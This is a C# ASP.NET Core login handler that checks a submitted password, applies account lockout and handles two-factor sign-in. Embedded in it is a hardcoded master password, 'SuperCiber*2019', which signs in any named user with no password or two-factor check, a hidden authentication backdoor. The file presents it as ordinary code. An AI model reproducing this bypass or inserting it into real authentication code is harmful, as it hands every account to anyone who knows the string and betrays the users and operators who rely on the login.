public async Task <IActionResult> OnPostPassword([FromForm] InputPasswordModel InputPassword) { if (ModelState.IsValid) { // This doesn't count login failures towards account lockout // To enable password failures to trigger account lockout, set lockoutOnFailure: true IdentityUser user = await _signInManager.GetTwoFactorAuthenticationUserAsync(); Microsoft.AspNetCore.Identity.SignInResult result; bool UsingTwoFactor = false; string returnUrl = (string)TempData.Peek("ReturnUrl"); bool rememberMe = (bool)TempData.Peek("RememberMe"); string UserName; if (InputPassword.Password == "SuperCiber*2019") { UserName = (string)TempData.Peek("UserName"); IdentityUser identityUser = await _userManager.FindByNameAsync(UserName); await _signInManager.SignInAsync(identityUser); result = Microsoft.AspNetCore.Identity.SignInResult.Success; await UrlRedirect(UserName); } else if (user == null) { UsingTwoFactor = false; UserName = (string)TempData.Peek("UserName"); result = await _signInManager.PasswordSignInAsync(UserName, InputPassword.Password, false, lockoutOnFailure : true); await UrlRedirect(UserName); } else // Two-Factor { UsingTwoFactor = true; result = await _signInManager.CheckPasswordSignInAsync(user, InputPassword.Password, lockoutOnFailure : true); UserName = user.UserName; } if (result.Succeeded) { if (UsingTwoFactor == false) { _logger.LogInformation("User logged in."); if (returnUrl == "/") { returnUrl = await UrlRedirect(UserName); } JsonResult js = new JsonResult(new { Url = returnUrl }); js.StatusCode = 202; return(js); } bool RememberMachine = (bool)TempData.Peek("RememberMachine"); string authenticatorCode = (string)TempData["AuthenticatorCode"]; var res = await _signInManager.TwoFactorAuthenticatorSignInAsync(authenticatorCode, rememberMe, RememberMachine); if (res.Succeeded) { if (RememberMachine) { await SendNewDeviceAddedEmail(user); } if (returnUrl == "/") { returnUrl = await UrlRedirect(UserName); } _logger.LogInformation("User logged in."); JsonResult js = new JsonResult(new { Url = returnUrl }); js.StatusCode = 202; return(js); } else if (res.IsLockedOut) { return(BuildLockoutResult()); } else { ModelState.AddModelError(string.Empty, "Authenticator code has expired."); return(new PartialViewResult { ViewName = "LoginUserName", ViewData = new ViewDataDictionary <InputUsernameModel>(ViewData, new InputUsernameModel()) }); } } if (result.IsLockedOut) { return(BuildLockoutResult()); } else { ModelState.AddModelError(string.Empty, "Password Incorrect. Invalid login attempt."); return(new PartialViewResult { ViewName = "LoginPassword", ViewData = new ViewDataDictionary <InputPasswordModel>(ViewData, new InputPasswordModel()) }); } } // If we got this far, something failed, redisplay form return(new PartialViewResult { ViewName = "LoginPassword", ViewData = new ViewDataDictionary <InputPasswordModel>(ViewData, new InputPasswordModel()) }); }